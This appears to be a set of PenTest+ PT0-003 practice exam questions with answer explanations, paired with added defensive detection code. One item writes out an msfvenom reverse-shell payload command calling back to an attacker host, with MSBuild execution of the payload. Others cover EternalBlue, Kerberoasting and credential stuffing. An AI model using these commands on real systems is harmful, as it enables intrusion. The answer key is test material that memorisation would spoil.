Practice Free PT0-003 Exam Online Questions
During an assessment, a penetration tester sends the following request:
POST /services/v1/users/create HTTP/1.1
Host: target-application.com
Content-Type: application/json
Content-Length: [dynamic]
Authorization: Bearer (FUZZ)
Which of the following attacks is the penetration tester performing?
- A . Directory traversal
- B . API abuse
- C . Server-side request forgery
- D . Privilege escalation
B
Explanation:
This attack attempts to manipulate the API by fuzzing the authorization token (Authorization: Bearer (FUZZ)). This suggests an attempt to bypass authentication or escalate privileges by using an invalid, stolen, or guessed token―a form of API abuse.
Option A (Directory traversal) ❌ :
Involves manipulating file paths (e.g., ../../../etc/passwd), but this attack targets API authentication.
Option B (API abuse) ✅ :
Correct. Fuzzing the authorization token suggests an attempt to bypass authentication or test for weak API security.
Option C (Server-side request forgery – SSRF) ❌ :
SSRF manipulates backend requests to make unauthorized HTTP calls, which is not evident here.
Option D (Privilege escalation) ❌ :
While API abuse may lead to privilege escalation, fuzzing the token alone does not directly escalate privileges.
Reference: CompTIA PenTest+ PT0-003 Official Guide – API Security Testing & Authentication Bypasses
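From the defender's side, the request above shows up as a burst of 401 responses from one client presenting many different bearer tokens to the same endpoint. The following is an added example (not from the exam guide) that finds that pattern in constructed application log lines; the log format and the tok= fingerprint field are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed app-log lines (not from the page): time, client IP, method, path, status and a
# short fingerprint of the presented bearer token (log a hash prefix, never the token itself).
SAMPLE_LOG = """\
2024-05-01T10:00:01Z 203.0.113.5 POST /services/v1/users/create 401 tok=a1f3
2024-05-01T10:00:02Z 203.0.113.5 POST /services/v1/users/create 401 tok=b77e
2024-05-01T10:00:02Z 203.0.113.5 POST /services/v1/users/create 401 tok=c902
2024-05-01T10:00:03Z 203.0.113.5 POST /services/v1/users/create 401 tok=d1d1
2024-05-01T10:00:04Z 203.0.113.5 POST /services/v1/users/create 401 tok=e5e5
2024-05-01T10:00:09Z 198.51.100.9 POST /services/v1/users/create 401 tok=1234
2024-05-01T10:05:00Z 203.0.113.5 POST /services/v1/users/create 401 tok=9999
"""
LINE_RE = re.compile(r"^(?P<ts>\S+) (?P<ip>\S+) (?P<method>\S+) (?P<path>\S+) (?P<status>\d{3}) tok=(?P<tok>\w+)$")

def parse(log_text):
    """Turn each well-formed line into a dict with a datetime and an int status."""
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            d = m.groupdict()
            d["ts"] = datetime.strptime(d["ts"], "%Y-%m-%dT%H:%M:%SZ")
            d["status"] = int(d["status"])
            events.append(d)
    return events

def detect_token_fuzzing(events, window=timedelta(seconds=60), min_distinct=5):
    """Return {(ip, path): n} for sources that presented at least min_distinct different
    rejected (401) bearer tokens to one endpoint within a sliding time window."""
    by_key = defaultdict(list)
    for e in events:
        if e["status"] == 401:
            by_key[(e["ip"], e["path"])].append(e)
    alerts = {}
    for key, evs in by_key.items():
        evs.sort(key=lambda e: e["ts"])
        start = 0
        for end in range(len(evs)):
            while evs[end]["ts"] - evs[start]["ts"] > window:
                start += 1          # slide the window forward past stale events
            toks = {e["tok"] for e in evs[start:end + 1]}
            if len(toks) >= min_distinct:
                alerts[key] = max(alerts.get(key, 0), len(toks))
    return alerts
```

A single client that legitimately retries with the same expired token never trips the rule, because the count is of distinct tokens, not of failures.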
A penetration tester completes a scan and sees the following Nmap output on a host:
Nmap scan report for victim (10.10.10.10)
Host is up (0.0001s latency)
PORT STATE SERVICE
161/udp open snmp
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
Running Microsoft Windows 7
OS CPE: cpe:/o:microsoft:windows_7::sp0
The tester wants to obtain shell access.
Which of the following related exploits should the tester try first?
- A . exploit/windows/smb/psexec
- B . exploit/windows/smb/ms08_067_netapi
- C . exploit/windows/smb/ms17_010_eternalblue
- D . auxiliary/scanner/snmp/snmp_login
C
Explanation:
Since the system is running Windows 7 SP0, it is highly likely to be vulnerable to MS17-010 (EternalBlue), a critical SMB vulnerability used for remote code execution (RCE).
Option A (psexec) ❌ : PsExec requires valid credentials, which we do not have yet.
Option B (ms08_067_netapi) ❌ : MS08-067 targets Windows XP/Server 2003, but the system is Windows 7.
Option C (ms17_010_eternalblue) ✅ : Correct.
EternalBlue allows remote exploitation of SMBv1 in Windows 7/Server 2008.
Option D (snmp_login scanner) ❌ : Only checks default SNMP credentials, not an exploit.
Reference: CompTIA PenTest+ PT0-003 Official Guide – SMB Exploitation & EternalBlue
During a penetration test, a tester captures information about an SPN account.
Which of the following attacks requires this information as a prerequisite to proceed?
- A . Golden Ticket
- B . Kerberoasting
- C . DCShadow
- D . LSASS dumping
B
Explanation:
Kerberoasting is an attack that specifically targets Service Principal Name (SPN) accounts in a Windows Active Directory environment.
Here’s a detailed explanation:
Understanding SPN Accounts:
SPNs are unique identifiers for services in a network that allow Kerberos to authenticate service accounts. These accounts are often associated with services such as SQL Server, IIS, etc.
Kerberoasting Attack:
Prerequisite: Knowledge of the SPN account.
Process: An attacker requests a service ticket for the SPN account using the Kerberos protocol. The ticket is encrypted with the service account’s NTLM hash. The attacker captures this ticket and attempts to crack the hash offline.
Objective: To obtain the plaintext password of the service account, which can then be used for lateral movement or privilege escalation.
Comparison with Other Attacks:
Golden Ticket: Involves forging Kerberos TGTs using the KRBTGT account hash, requiring domain admin credentials.
DCShadow: Involves manipulating Active Directory data by impersonating a domain controller, typically requiring high privileges.
LSASS Dumping: Involves extracting credentials from the LSASS process on a Windows machine, often requiring local admin privileges.
Kerberoasting specifically requires the SPN account information to proceed, making it the correct answer.
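Because the service-ticket request is a legitimate Kerberos operation, the detection signal is the pattern rather than any single event: one account pulling RC4-encrypted (type 0x17) service tickets for many different service accounts within minutes, which is what Windows Security event 4769 records. Added example, not from the guide; the events are constructed and the field names are simplified versions of the 4769 fields.

```python
from collections import defaultdict
from datetime import datetime

RC4_HMAC = "0x17"   # the ticket encryption type Kerberoasting tooling asks for (fastest to crack)

# Constructed events shaped like Windows Security event 4769 (not from the page):
# requesting account, service account that owns the SPN, ticket encryption type, result code.
SAMPLE_4769 = [
    {"time": "2024-05-01T09:00:01", "user": "alice", "service": "svc_sql",    "etype": "0x17", "status": "0x0"},
    {"time": "2024-05-01T09:00:02", "user": "alice", "service": "svc_iis",    "etype": "0x17", "status": "0x0"},
    {"time": "2024-05-01T09:00:02", "user": "alice", "service": "svc_backup", "etype": "0x17", "status": "0x0"},
    {"time": "2024-05-01T09:00:03", "user": "alice", "service": "WS01$",      "etype": "0x17", "status": "0x0"},
    {"time": "2024-05-01T09:00:04", "user": "alice", "service": "krbtgt",     "etype": "0x12", "status": "0x0"},
    {"time": "2024-05-01T09:00:10", "user": "bob",   "service": "svc_sql",    "etype": "0x12", "status": "0x0"},
    {"time": "2024-05-01T09:30:00", "user": "bob",   "service": "svc_iis",    "etype": "0x17", "status": "0x0"},
]

def is_rc4_spn_request(ev):
    """Successful RC4 ticket request for a user-style service account. Machine accounts ($)
    and the krbtgt service are excluded: their keys are random and not what is roasted."""
    svc = ev["service"]
    if svc.endswith("$") or svc.lower() == "krbtgt":
        return False
    return ev["etype"] == RC4_HMAC and ev["status"] == "0x0"

def detect_kerberoasting(events, bucket_minutes=5, min_services=3):
    """Group qualifying requests per (requester, time bucket) and report requesters that
    touched at least min_services distinct service accounts in one bucket."""
    seen = defaultdict(set)
    for ev in events:
        if not is_rc4_spn_request(ev):
            continue
        t = datetime.fromisoformat(ev["time"])
        bucket = t.replace(second=0, microsecond=0, minute=t.minute - t.minute % bucket_minutes)
        seen[(ev["user"], bucket)].add(ev["service"])
    alerts = {}
    for (user, _), svcs in seen.items():
        if len(svcs) >= min_services:
            alerts[user] = max(alerts.get(user, 0), len(svcs))
    return alerts
```

In a domain where service accounts are configured for AES only, any 0x17 request for them is worth a look on its own; the bucketing is what keeps the rule useful where RC4 is still common.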
A penetration tester plans to conduct reconnaissance during an engagement using readily available resources.
Which of the following resources would most likely identify hardware and software being utilized by the client?
- A . Cryptographic flaws
- B . Protocol scanning
- C . Cached pages
- D . Job boards
D
Explanation:
To conduct reconnaissance and identify hardware and software used by a client, job boards are an effective resource. Companies often list the technologies they use in job postings to attract qualified candidates. These listings can provide valuable insights into the specific hardware and software platforms the client is utilizing.
Reconnaissance:
This is the first phase in penetration testing, involving gathering as much information as possible about the target.
Reconnaissance can be divided into two types: passive and active. Job boards fall under passive reconnaissance, where the tester gathers information without directly interacting with the target systems.
Job Boards:
Job postings often include detailed descriptions of the technologies and tools used within the company.
For example, a job posting for a network administrator might list specific brands of hardware (like Cisco routers) or software (like VMware).
Examples of Job Boards:
Websites like LinkedIn, Indeed, Glassdoor, and company career pages can be used to find relevant job postings.
These postings might mention operating systems (Windows, Linux), development frameworks (Spring, .NET), databases (Oracle, MySQL), and more.
Pentest Reference: OSINT (Open Source Intelligence): Using publicly available sources to gather information about a target.
Job boards are a key source of OSINT, providing indirect access to the internal technologies of a company.
This information can be used to tailor subsequent phases of the penetration test, such as vulnerability scanning and exploitation, to the specific technologies identified.
By examining job boards, a penetration tester can gain insights into the hardware and software environments of the target, making this a valuable reconnaissance tool.
During the reconnaissance phase, a penetration tester collected the following information from the DNS records:
A -> www
A -> host
TXT -> vpn.comptia.org
SPF -> ip=2.2.2.2
Which of the following DNS records should be in place to avoid phishing attacks using spoofing domain techniques?
- A . MX
- B . SOA
- C . DMARC
- D . CNAME
C
Explanation:
DMARC (Domain-based Message Authentication, Reporting & Conformance) is an email authentication protocol that helps prevent email spoofing and phishing. It builds on SPF (Sender Policy Framework) and DKIM (DomainKeys Identified Mail) to provide a mechanism for email senders and receivers to improve and monitor the protection of the domain from fraudulent email.
Understanding DMARC:
SPF: Defines which IP addresses are allowed to send emails on behalf of a domain.
DKIM: Provides a way to check that an email claiming to come from a specific domain was indeed authorized by the owner of that domain.
DMARC: Uses SPF and DKIM to determine the authenticity of an email and specifies what action to take if the email fails the authentication checks.
Implementing DMARC:
Create a DMARC policy in your DNS records. This policy can specify to reject, quarantine, or take no action on emails that fail SPF or DKIM checks.
Example DMARC record: v=DMARC1; p=reject; rua=mailto:[email protected];
Benefits of DMARC:
Helps to prevent email spoofing and phishing attacks.
Provides visibility into email sources through reports.
Enhances domain reputation by ensuring only legitimate emails are sent from the domain.
DMARC Record Components:
v: Version of DMARC.
p: Policy for handling emails that fail the DMARC check (none, quarantine, reject).
rua: Reporting URI of aggregate reports.
ruf: Reporting URI of forensic reports.
pct: Percentage of messages subjected to filtering.
Real-World Example:
A company sets up a DMARC policy with p=reject to ensure that any emails failing SPF or DKIM checks are rejected outright, significantly reducing the risk of phishing attacks using their domain.
Reference from Pentesting Literature:
In "Penetration Testing – A Hands-on Introduction to Hacking," DMARC is mentioned as part of email security protocols to prevent phishing.
HTB write-ups often highlight the importance of DMARC in securing email communications and preventing spoofing attacks.
Reference: Penetration Testing – A Hands-on Introduction to Hacking; HTB Official Writeups
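Added example (not from the referenced books): parse a DMARC record and apply it to a message the way a receiver would, which shows why the SPF record alone in the question does not stop a spoofed From: header and why p=none still delivers it. Domains and the rua address are placeholders, and organizational-domain matching is simplified (real receivers use the Public Suffix List).

```python
def parse_dmarc(record):
    """Return the DMARC tags as a dict; v=DMARC1 and a valid p= are mandatory."""
    tags = {}
    for part in record.split(";"):
        key, _, value = part.strip().partition("=")
        if key:
            tags[key.strip().lower()] = value.strip()
    if tags.get("v") != "DMARC1":
        raise ValueError("not a DMARC1 record")
    if tags.get("p") not in ("none", "quarantine", "reject"):
        raise ValueError("missing or invalid p= tag")
    tags.setdefault("aspf", "r")     # relaxed alignment unless the record says s (strict)
    tags.setdefault("adkim", "r")
    return tags

def org_domain(domain):
    # Simplified organizational domain: the last two labels (assumption for this example).
    return ".".join(domain.lower().rsplit(".", 2)[-2:])

def aligned(header_from, auth_domain, mode):
    """Strict alignment needs an exact match; relaxed accepts the same organizational domain."""
    if mode == "s":
        return header_from.lower() == auth_domain.lower()
    return org_domain(header_from) == org_domain(auth_domain)

def dmarc_disposition(policy, header_from, spf_pass, spf_domain, dkim_pass, dkim_domain):
    """DMARC passes only if SPF or DKIM passed AND that identifier aligns with the visible
    From: domain; otherwise the receiver applies the p= action (none = deliver anyway)."""
    spf_ok = spf_pass and aligned(header_from, spf_domain, policy["aspf"])
    dkim_ok = dkim_pass and aligned(header_from, dkim_domain, policy["adkim"])
    return "pass" if (spf_ok or dkim_ok) else policy["p"]

WEAK_RECORD = "v=DMARC1; p=none; rua=mailto:dmarc@example.com"                    # monitor only
STRONG_RECORD = "v=DMARC1; p=reject; aspf=s; adkim=s; rua=mailto:dmarc@example.com"

def spoof_outcome(record):
    """A message claiming From: example.com but sent from an unrelated domain: SPF passes
    for the sender's own domain, so plain SPF is satisfied, yet nothing aligns with example.com."""
    policy = parse_dmarc(record)
    return dmarc_disposition(policy, "example.com", True, "attacker.invalid", False, "")
```

Note the strict-alignment side effect: with adkim=s a legitimate message DKIM-signed by mail.example.com no longer aligns with From: example.com and is rejected, so alignment mode has to match how the organization actually signs.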
A penetration tester uses a reverse shell to maintain connectivity to a target network. During the final phase of the exercise, the penetration tester removes the reverse shell.
Which of the following is an example of these activities?
- A . Removing persistence mechanisms
- B . Uninstalling tools
- C . Preserving artifacts
- D . Reverting configuration changes
A
Explanation:
A reverse shell that is left on a target to maintain access is a form of persistence/backdoor. The action described ― removing the reverse shell at the end of the engagement ― is specifically the removal of a persistence mechanism. Post-engagement cleanup requires removal of any artifacts that provide continued access (web shells, scheduled tasks, reverse shells, cron jobs, created accounts, etc.) so the environment is returned to its pre-test state and to prevent later compromise.
Why not the others:
B (Uninstalling tools): Removing tools is also a cleanup activity, but the question explicitly references removing the reverse shell (persistence).
C (Preserving artifacts): Preserving artifacts is the opposite (saving logs/evidence) for incident response ― not removing access.
D (Reverting configuration changes): Important, but the best single match for removing a reverse shell is “removing persistence mechanisms.”
PT0-003 mapping: Domain 5 ― post-engagement cleanup and returning environment to baseline.
A tester plans to perform an attack technique over a compromised host.
The tester prepares a payload using the following command:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.12.12.1 LPORT=10112 -f csharp
The tester then takes the shellcode from the msfvenom command and creates a file called evil.xml.
Which of the following commands would most likely be used by the tester to continue with the attack on the host?
- A . regsvr32 /s /n /u C:\evil.xml
- B . MSBuild.exe C:\evil.xml
- C . mshta.exe C:\evil.xml
- D . AppInstaller.exe C:\evil.xml
B
Explanation:
The provided msfvenom command creates a payload in C# format. To continue the attack using the generated shellcode in evil.xml, the most appropriate execution method involves MSBuild.exe, which can process XML files containing C# code:
Understanding MSBuild.exe:
Purpose: MSBuild is a build tool that processes project files written in XML and can execute tasks defined in the XML. It’s commonly used to build .NET applications and can also execute code embedded in project files.
Command Usage:
Command: MSBuild.exe C:\evil.xml
This command tells MSBuild to process the evil.xml file, which contains the C# shellcode. MSBuild will compile and execute the code, leading to the payload execution.
Comparison with Other Commands:
regsvr32 /s /n /u C:\evil.xml: Used to register or unregister DLLs, not suitable for executing C# code.
mshta.exe C:\evil.xml: Used to execute HTML applications (HTA files), not suitable for XML containing C# code.
AppInstaller.exe C:\evil.xml: Used to install AppX packages, not relevant for executing C# code embedded in an XML file.
Using MSBuild.exe is the most appropriate method to execute the payload embedded in the XML file created by msfvenom.
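From the detection side, the tell is MSBuild.exe being handed a project file from a user-writable location or with an .xml extension instead of a normal .csproj, since that is not how builds are run. Added example, not from the guide; the process-creation events, paths and field names are constructed.

```python
import ntpath
import re

# Constructed process-creation events (not from the page); paths are illustrative placeholders.
SAMPLE_PROCESS_EVENTS = [
    {"image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
     "cmdline": r"MSBuild.exe C:\Users\Public\evil.xml",
     "parent": r"C:\Windows\System32\cmd.exe"},
    {"image": r"C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Current\Bin\MSBuild.exe",
     "cmdline": r'MSBuild.exe "C:\src\app\app.csproj" /t:Build',
     "parent": r"C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\devenv.exe"},
    {"image": r"C:\Windows\System32\notepad.exe", "cmdline": "notepad.exe", "parent": "explorer.exe"},
]

PROJECT_EXT = (".xml", ".csproj", ".vbproj", ".proj", ".sln", ".targets")
CONVENTIONAL = {".csproj", ".vbproj", ".proj", ".sln"}          # what a real build normally passes
USER_WRITABLE = ("\\users\\", "\\programdata\\", "\\temp\\")    # where a dropped file usually lands

def project_args(cmdline):
    """Return command-line arguments that look like project files, quoted or bare,
    skipping the program name and /switches."""
    toks = [q or b for q, b in re.findall(r'"([^"]+)"|(\S+)', cmdline)]
    return [t for t in toks[1:] if not t.startswith("/") and t.lower().endswith(PROJECT_EXT)]

def is_suspicious_msbuild(ev):
    """Flag MSBuild runs whose project file sits in a user-writable location or uses an
    unconventional extension such as .xml, the shape of inline-task payload execution."""
    if ntpath.basename(ev["image"]).lower() != "msbuild.exe":
        return False
    for proj in project_args(ev["cmdline"]):
        low = proj.lower()
        if any(m in low for m in USER_WRITABLE) or ntpath.splitext(low)[1] not in CONVENTIONAL:
            return True
    return False

def triage(events):
    """Return (command line, parent process) for each suspicious MSBuild execution."""
    return [(ev["cmdline"], ntpath.basename(ev["parent"])) for ev in events if is_suspicious_msbuild(ev)]
```

On non-developer endpoints a simpler rule, any MSBuild.exe execution at all, is usually viable; the path and extension checks are what keep the rule quiet on build machines.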
A penetration tester obtains password dumps associated with the target and identifies strict lockout policies. The tester does not want to lock out accounts when attempting access.
Which of the following techniques should the tester use?
- A . Credential stuffing
- B . MFA fatigue
- C . Dictionary attack
- D . Brute-force attack
A
Explanation:
To avoid locking out accounts while attempting access, the penetration tester should use credential stuffing.
Credential Stuffing:
Definition: An attack method where attackers use a list of known username and password pairs, typically obtained from previous data breaches, to gain unauthorized access to accounts.
Advantages: Unlike brute-force attacks, credential stuffing uses already known credentials, which reduces the number of attempts per account and minimizes the risk of triggering account lockout mechanisms.
Tool: Tools like Sentry MBA, Snipr, and others are commonly used for credential stuffing attacks.
Other Techniques:
MFA Fatigue: A social engineering tactic to exhaust users into accepting multi-factor authentication requests, not applicable for avoiding lockouts in this context.
Dictionary Attack: Similar to brute-force but uses a list of likely passwords; still risks lockout due to multiple attempts.
Brute-force Attack: Systematically attempts all possible password combinations, likely to trigger account lockouts due to the high number of failed attempts.
Pentest Reference: Password Attacks: Understanding different types of password attacks and their implications on account security.
Account Lockout Policies: Awareness of how lockout mechanisms work and strategies to avoid triggering them during penetration tests.
By using credential stuffing, the penetration tester can attempt to gain access using known credentials without triggering account lockout policies, ensuring a stealthier approach to password attacks.
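The same lockout trade-off is what makes credential stuffing recognisable to a defender: many accounts with one or two attempts each, rather than one account hammered past the threshold. Added example, not from the guide, that separates the two patterns in constructed authentication log lines; the log format and thresholds are assumptions.

```python
import re
from collections import defaultdict

# Constructed authentication log (not from the page): one line per login attempt.
SAMPLE_AUTH_LOG = """\
2024-05-01T08:00:00Z 203.0.113.7 login user=alice result=fail
2024-05-01T08:00:01Z 203.0.113.7 login user=bob result=fail
2024-05-01T08:00:02Z 203.0.113.7 login user=carol result=fail
2024-05-01T08:00:03Z 203.0.113.7 login user=dave result=fail
2024-05-01T08:00:04Z 203.0.113.7 login user=erin result=fail
2024-05-01T08:00:05Z 203.0.113.7 login user=frank result=success
2024-05-01T08:10:00Z 198.51.100.3 login user=alice result=fail
2024-05-01T08:10:01Z 198.51.100.3 login user=alice result=fail
2024-05-01T08:10:02Z 198.51.100.3 login user=alice result=fail
2024-05-01T08:10:03Z 198.51.100.3 login user=alice result=fail
2024-05-01T08:10:04Z 198.51.100.3 login user=alice result=fail
2024-05-01T08:10:05Z 198.51.100.3 login user=alice result=fail
2024-05-01T08:15:00Z 192.0.2.10 login user=grace result=success
"""
LINE_RE = re.compile(r"^(?P<ts>\S+) (?P<ip>\S+) login user=(?P<user>\S+) result=(?P<result>\w+)$")

def summarize(log_text):
    """Per source IP: total attempts, attempts per account, and successes."""
    stats = defaultdict(lambda: {"attempts": 0, "per_user": defaultdict(int), "success": 0})
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        s = stats[m["ip"]]
        s["attempts"] += 1
        s["per_user"][m["user"]] += 1
        s["success"] += int(m["result"] == "success")
    return stats

def classify(stats, lockout_threshold=5, min_accounts=5):
    """brute-force: one account hit at least lockout_threshold times (lockout will fire);
    credential-stuffing: many accounts, each tried only a few times (lockout never fires)."""
    labels = {}
    for ip, s in stats.items():
        peak = max(s["per_user"].values())
        failures = s["attempts"] - s["success"]
        if peak >= lockout_threshold:
            labels[ip] = "brute-force"
        elif len(s["per_user"]) >= min_accounts and failures >= min_accounts:
            labels[ip] = "credential-stuffing"
        else:
            labels[ip] = "normal"
    return labels
```

The per-account lockout counter sees nothing unusual in the first source, which is exactly why a per-source view (and a rate limit keyed on source rather than account) is the control that catches it.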
